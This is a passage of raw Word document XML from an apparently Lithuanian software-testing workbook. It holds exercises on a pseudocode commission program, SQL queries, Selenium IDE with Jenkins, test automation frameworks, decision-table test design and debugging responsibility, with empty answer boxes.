              <w:t>6          total = total + number</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>7          read ( number )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>8     endloop</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>9     if total &gt; 1000 then</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>10         commission_hi = 100 + 0.2 * ( total – 1000 )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>11   else</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>12        commission_lo = 0.15 * total</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>13   endif</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>14   write ( “This salesman’s commission is:”)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>15   write ( commission_hi )</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001A040A" w:rsidRPr="00AD4464" w:rsidRDefault="001A040A" w:rsidP="00372B3A">
            <w:pPr>
              <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6"/>
              <w:ind w:left="709" w:hanging="709"/>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>16 end program Calculate Commission</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3650" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="001A040A" w:rsidRPr="00AD4464" w:rsidRDefault="00E86E96" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>Atsakymas:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00A94F7D" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Duotam</w:t>
      </w:r>
      <w:r w:rsidR="002F299F" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> duomenų rinkiniui parašykite</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> užklausas, atsakydami į žemiau pateiktus klausimus. Pakomentuokite, jei matysite sąsajų tarp užklausų. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E327CCD" wp14:editId="01EAB638">
            <wp:extent cx="3061335" cy="1524000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20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61335" cy="1524000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002F299F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Atvaizduokite </w:t>
      </w:r>
      <w:r w:rsidR="007D61B3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>darbuotojus, gyvenančius</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> bet kuriame mieste, išskyrus Londoną;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002F299F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Raskite visus darbuotojus, kurių vardas neprasideda reidėmis “A” arba “M”.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="002F299F" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Parašykite užklausą, Kuri gražintų tokį rezultatą:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="1440"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="245D2B7B" wp14:editId="2559DCD0">
            <wp:extent cx="2835910" cy="821690"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="20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35910" cy="821690"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F251E" w:rsidRPr="00AD4464" w:rsidRDefault="009F251E" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-E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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="009F251E" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="009F251E" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Atsakymai:</w:t>
            </w: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F251E" w:rsidRPr="00AD4464" w:rsidRDefault="009F251E" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D31EE8" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ar galima Selenium IDE įs</w:t>
      </w:r>
      <w:r w:rsidR="007D61B3" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>kiepio įrašytus testus leisti Jenkins nuolatinės integracijos įrankyje? Paaiškinkite.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005C7C11" w:rsidRPr="00AD4464" w:rsidRDefault="005C7C11" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tab/>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9"/>
      </w:tblGrid>
      <w:tr w:rsidR="005C7C11" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9179" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="005C7C11" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w: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5C7C11" w:rsidRPr="00AD4464" w:rsidRDefault="005C7C11" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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CA1296" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Įvardinkite pagrindinius testų automatizavimo karkasų privalumus.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D44FF" w:rsidRPr="00AD4464" w:rsidRDefault="002D44FF" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-E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4"/>
      </w:tblGrid>
      <w:tr w:rsidR="003F6AA3" w:rsidRPr="00AD4464" w:rsidTr="002D44FF">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9134" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="003F6AA3" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w: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C06E72" w:rsidRPr="00AD4464" w:rsidRDefault="00C06E72" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009E2231" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Pateiktai veiklos diagramai taikydami sprendimų lentelių technik</w:t>
      </w:r>
      <w:r w:rsidR="007F0ADF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ą</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> nustatykite optimalų testavimo atvejų skaičių. Pateikite galutinį (normalizuotą) testavimo atvejų sąrašą.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00D77CE1" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Transporto priemonės draudimo bazinės įmokos apskaičiavimo veiklos diagrama</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CA1296" w:rsidRPr="00AD4464" w:rsidRDefault="00C35D02" w:rsidP="00372B3A">
      <w:pPr>
        <w:contextualSpacing/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="lt-LT" w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0378DADA" wp14:editId="4E709504">
            <wp:extent cx="5804535" cy="2650490"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="204" name="Paveikslėlis 204" descr="Rasti bazinę įmok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Rasti bazinę įmoką"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId109">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect l="3705" t="8722" r="3705" b="7996"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5804535" cy="2650490"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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1"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C06E72" w:rsidRPr="00AD4464" w:rsidTr="001F4E37">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9854" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w:rsidR="009D6E00" w:rsidRDefault="00C06E72" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD4464">
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Atsakymas:</w:t>
            </w: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9D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w:rsidR="00C06E72" w:rsidRPr="00AD4464" w:rsidRDefault="00C06E72" w:rsidP="00372B3A">
            <w:pPr>
              <w:contextualSpacing/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E71271" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Kas yra atsakingas už </w:t>
      </w:r>
      <w:r w:rsidR="007F0ADF" w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>rogramų derinimą?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E71271" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Programuotojai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E71271" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Testuotojai</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00257271" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Visi</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00257271" w:rsidP="00372B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:contextualSpacing/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Devops</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="00E350EA" w:rsidP="00372B3A">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="420"/>
        </w:tabs>
        <w:ind w:right="282"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4464">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="242" w:name="_Toc1280845507"/>
      <w:bookmarkStart w:id="243" w:name="_Toc10443995"/>
      <w:r w:rsidR="002E36AD" w:rsidRPr="002E36AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Užduočių </w:t>
      </w:r>
      <w:r w:rsidR="002E36AD" w:rsidRPr="002E36AD">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>atsakymai</w:t>
      </w:r>
      <w:bookmarkEnd w:id="242"/>
      <w:bookmarkEnd w:id="243"/>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009D6E00" w:rsidRDefault="009D6E00" w:rsidP="00372B3A">
      <w:pPr>
        <w:ind w:right="282"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
